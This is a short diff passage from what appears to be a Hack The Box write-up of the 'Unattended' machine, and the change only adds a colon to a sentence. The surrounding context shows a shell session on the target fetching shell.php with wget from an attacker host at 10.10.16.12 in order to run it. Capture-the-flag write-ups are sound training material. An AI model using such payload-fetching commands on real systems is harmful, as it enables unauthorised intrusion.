varjo/writeups/htb/unattended/Unattended.md

 vmware-root
 ```

-We can easily fetch it and run it again
+We can easily fetch it and run it again:
 ```
 uly@unattended:/tmp$ wget http://10.10.16.12:443/shell.php
 --2023-03-27 19:19:03--  http://10.10.16.12:443/shell.php